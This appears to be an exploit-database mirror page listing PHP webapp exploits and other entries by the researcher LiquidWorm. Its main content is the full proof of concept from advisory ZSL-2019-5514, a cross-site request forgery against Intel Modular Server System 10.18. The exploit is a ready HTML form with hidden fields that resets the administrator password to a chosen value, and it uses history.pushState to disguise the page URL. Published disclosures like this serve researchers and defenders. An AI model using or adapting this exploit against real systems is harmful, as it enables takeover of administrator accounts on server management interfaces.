Menu

Improved exploit search engine. Try python and hit enter

"Intel Modular Server System 10.18 - Cross-Site Request Forgery (Change Admin Password)"

Author

LiquidWorm

Platform

php

Release date

2019-03-14

Release Date Title Type Platform Author
2019-03-18 "TheCarProject v2 - Multiple SQL Injection" webapps php "Mehmet EMIROGLU"
2019-03-15 "Moodle 3.4.1 - Remote Code Execution" webapps php "Darryn Ten"
2019-03-15 "Laundry CMS - Multiple Vulnerabilities" webapps php "Mehmet EMIROGLU"
2019-03-15 "Vembu Storegrid Web Interface 4.4.0 - Multiple Vulnerabilities" webapps php "Gionathan Reale"
2019-03-15 "ICE HRM 23.0 - Multiple Vulnerabilities" webapps php "Mehmet EMIROGLU"
2019-03-15 "CMS Made Simple Showtime2 Module 3.6.2 - (Authenticated) Arbitrary File Upload" webapps php "Daniele Scanu"
2019-03-14 "Pegasus CMS 1.0 - 'extra_fields.php' Plugin Remote Code Execution" webapps php R3zk0n
2019-03-14 "Intel Modular Server System 10.18 - Cross-Site Request Forgery (Change Admin Password)" webapps php LiquidWorm
2019-03-13 "pfSense 2.4.4-p1 (HAProxy Package 0.59_14) - Persistent Cross-Site Scripting" webapps php "Gionathan Reale"
2019-03-13 "WordPress Plugin GraceMedia Media Player 1.0 - Local File Inclusion" webapps php "Manuel García Cárdenas"
2019-03-13 "elFinder PHP Connector < 2.1.48 - exiftran Command Injection (Metasploit)" remote php Metasploit
2019-03-12 "PilusCart 1.4.1 - Cross-Site Request Forgery (Add Admin)" webapps php "Gionathan Reale"
2019-03-11 "Flexpaper PHP Publish Service 2.3.6 - Remote Code Execution" webapps php redtimmysec
2019-03-08 "DirectAdmin 1.55 - 'CMD_ACCOUNT_ADMIN' Cross-Site Request Forgery" webapps php ManhNho
2019-12-12 "phpBB 3.2.3 - Remote Code Execution" webapps php allyshka
2019-03-01 "WordPress Core 5.0 - Remote Code Execution" webapps php allyshka
2019-03-07 "Kados R10 GreenBee - Multiple SQL Injection" webapps php "Mehmet EMIROGLU"
2019-03-05 "OpenDocMan 1.3.4 - 'search.php where' SQL Injection" webapps php "Mehmet EMIROGLU"
2019-03-07 "Drupal < 8.5.11 / < 8.6.10 - RESTful Web Services unserialize() Remote Command Execution (Metasploit)" remote php Metasploit
2019-03-04 "WordPress Plugin Cerber Security_ Antispam & Malware Scan 8.0 - Multiple Bypass Vulnerabilities" webapps php ed0x21son
2019-03-04 "Craft CMS 3.1.12 Pro - Cross-Site Scripting" webapps php "Ismail Tasdelen"
2019-03-04 "Bolt CMS 3.6.4 - Cross-Site Scripting" webapps php "Ismail Tasdelen"
2019-03-04 "elFinder 2.1.47 - Command Injection vulnerability in the PHP connector" webapps php q3rv0
2019-03-04 "CMSsite 1.0 - Multiple Cross-Site Request Forgery" webapps php "Mr Winst0n"
2019-03-04 "OOP CMS BLOG 1.0 - Multiple Cross-Site Request Forgery" webapps php "Mr Winst0n"
2019-03-04 "OOP CMS BLOG 1.0 - Multiple SQL Injection" webapps php "Mr Winst0n"
2019-03-04 "Booked Scheduler 2.7.5 - Remote Command Execution (Metasploit)" webapps php AkkuS
2019-03-04 "zzzphp CMS 1.6.1 - Cross-Site Request Forgery" webapps php "Yang Chenglong"
2019-02-28 "Feng Office 3.7.0.5 - Remote Command Execution (Metasploit)" webapps php AkkuS
2019-02-28 "Joomla! Component J2Store < 3.3.7 - SQL Injection" webapps php "Andrei Conache"
Release Date Title Type Platform Author
2019-03-14 "Intel Modular Server System 10.18 - Cross-Site Request Forgery (Change Admin Password)" webapps php LiquidWorm
2019-02-05 "BEWARD N100 H.264 VGA IP Camera M2.1.6 - Arbitrary File Disclosure" webapps hardware LiquidWorm
2019-02-05 "BEWARD N100 H.264 VGA IP Camera M2.1.6 - Remote Code Execution" webapps hardware LiquidWorm
2019-02-05 "BEWARD N100 H.264 VGA IP Camera M2.1.6 - Cross-Site Request Forgery (Add Admin)" webapps hardware LiquidWorm
2019-02-05 "BEWARD N100 H.264 VGA IP Camera M2.1.6 - RTSP Stream Disclosure" webapps hardware LiquidWorm
2019-01-28 "BEWARD Intercom 2.3.1 - Credentials Disclosure" local windows LiquidWorm
2019-01-07 "Leica Geosystems GR10/GR25/GR30/GR50 GNSS 4.30.063 - JS/HTML Code Injection" webapps windows LiquidWorm
2019-01-07 "Leica Geosystems GR10/GR25/GR30/GR50 GNSS 4.30.063 - Cross-Site Request Forgery" webapps windows LiquidWorm
2018-11-30 "Synaccess netBooter NP-02x/NP-08x 6.8 - Authentication Bypass" webapps cgi LiquidWorm
2018-11-21 "Synaccess netBooter NP-0801DU 7.4 - Cross-Site Request Forgery (Add Admin)" webapps hardware LiquidWorm
2018-11-05 "Microsoft Internet Explorer 11 - Null Pointer Dereference" local windows LiquidWorm
2018-10-17 "TP-Link TL-SC3130 1.6.18 - RTSP Stream Disclosure" webapps hardware LiquidWorm
2018-10-15 "FLIR AX8 Thermal Camera 1.32.16 - Remote Code Execution" webapps hardware LiquidWorm
2018-10-15 "FLIR Brickstream 3D+ 2.1.742.1842 - Config File Disclosure" webapps hardware LiquidWorm
2018-10-15 "FLIR AX8 Thermal Camera 1.32.16 - Arbitrary File Disclosure" webapps hardware LiquidWorm
2018-10-08 "FLIR Thermal Traffic Cameras 1.01-0bb5b27 - Information Disclosure" webapps hardware LiquidWorm
2018-10-06 "FLIR Thermal Traffic Cameras 1.01-0bb5b27 - RTSP Stream Disclosure" webapps hardware LiquidWorm
2018-07-17 "Microhard Systems 3G/4G Cellular Ethernet and Serial Gateway - Remote Root" webapps hardware LiquidWorm
2018-07-17 "Microhard Systems 3G/4G Cellular Ethernet and Serial Gateway - File Manipulation" webapps hardware LiquidWorm
2018-07-17 "Microhard Systems 3G/4G Cellular Ethernet and Serial Gateway - Configuration Download" webapps hardware LiquidWorm
2018-07-17 "Microhard Systems 3G/4G Cellular Ethernet and Serial Gateway - Denial of Service" webapps hardware LiquidWorm
2018-07-17 "Microhard Systems 3G/4G Cellular Ethernet and Serial Gateway - Cross-Site Request Forgery" webapps hardware LiquidWorm
2018-06-25 "Ecessa ShieldLink SL175EHQ < 10.7.4 - Cross-Site Request Forgery (Add Superuser)" webapps hardware LiquidWorm
2018-06-25 "Ecessa WANWorx WVR-30 < 10.7.4 - Cross-Site Request Forgery (Add Superuser)" webapps hardware LiquidWorm
2018-06-25 "Ecessa Edge EV150 10.7.4 - Cross-Site Request Forgery (Add Superuser)" webapps linux LiquidWorm
2018-10-15 "FLIR AX8 Thermal Camera 1.32.16 - RTSP Stream Disclosure" webapps hardware LiquidWorm
2018-10-15 "FLIR Brickstream 3D+ - RTSP Stream Disclosure" webapps hardware LiquidWorm
2018-05-21 "Teradek Slice 7.3.15 - Cross-Site Request Forgery" webapps hardware LiquidWorm
2018-05-21 "Teradek Cube 7.3.6 - Cross-Site Request Forgery" webapps hardware LiquidWorm
2018-05-21 "Teradek VidiU Pro 3.0.3 - Server-Side Request Forgery" webapps hardware LiquidWorm
import requests
response = requests.get('https://www.nmmapper.com/api/exploitdetails/46541/?format=json')
For full documentation follow the link above

Ads

Browse exploit DB API Browse

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
<!--

Intel Modular Server System 10.18 CSRF Change Admin Password Exploit


Vendor: Intel Corporation
Product web page: https://www.intel.com
Affected version: 10.18.100.20130627.38849
                  5.5.100.20091202.19584

Summary: The Intel Modular Server System is a blade system manufactured by
Intel using their own motherboards and processors. The Intel Modular Server
System consists of an Intel Modular Server Chassis, up to six diskless Compute
Blades, an integrated storage area network (SAN), and three to five Service
Modules.

Desc: The application interface allows users to perform certain actions via
HTTP requests without performing any validity checks to verify the requests.
This can be exploited to perform certain actions with administrative privileges
if a logged-in user visits a malicious web site.

Tested on: lighttpd/1.4.30
           lighttpd/1.4.21
           PHP/5.3.10
           PHP/5.2.2


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience


Advisory ID: ZSL-2019-5514
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5514.php


11.03.2019

-->


<html>
  <body>
  <script>history.pushState('', 't00t', 'index.php')</script>
    <form action="https://192.168.1.17:444/users/?table=User&UserId=1&action=edit&template=none" method="POST">
      <input type="hidden" name="_dbTable[User][1][UserId]" value="1" />
      <input type="hidden" name="_dbTable[User][1][Username]" value="admin" />
      <input type="hidden" name="_dbTable[User][1][AuthMethod]" value="Local" />
      <input type="hidden" name="_dbTable[User][1][Password][update]" value="on" />
      <input type="hidden" name="_dbTable[User][1][Password][new]" value="(ontrol!23" />
      <input type="hidden" name="_dbTable[User][1][Password][confirm]" value="(ontrol!23" />
      <input type="hidden" name="_dbTable[User][1][AlertEmail]" value="lab@zeroscience.mk" />
      <input type="hidden" name="_dbTable[User][1][CriticalEmail]" value="" />
      <input type="hidden" name="_dbTable[User][1][Phone]" value="031-337-101" />
      <input type="hidden" name="_dbTable[User][1][Locked]" value="0" />
      <input type="hidden" name="action" value="Update" />
      <input type="hidden" name="_dbTable[UserRights][21][Alerts]" value="3" />
      <input type="hidden" name="_dbTable[UserRights][22][Alerts]" value="3" />
      <input type="hidden" name="_dbTable[UserRights][23][Alerts]" value="3" />
      <input type="hidden" name="_dbTable[UserRights][24][Alerts]" value="3" />
      <input type="hidden" name="_dbTable[UserRights][25][Alerts]" value="3" />
      <input type="hidden" name="_dbTable[UserRights][26][Alerts]" value="3" />
      <input type="hidden" name="_dbTable[UserRights][27][Alerts]" value="3" />
      <input type="hidden" name="_dbTable[UserRights][28][Alerts]" value="3" />
      <input type="hidden" name="_dbTable[UserRights][29][Alerts]" value="3" />
      <input type="hidden" name="_dbTable[UserRights][247][Alerts]" value="3" />
      <input type="hidden" name="DbTable" value="User" />
      <input type="hidden" name="DbTableKey" value="1" />
      <input type="submit" value="Do et!" />
    </form>
  </body>
</html>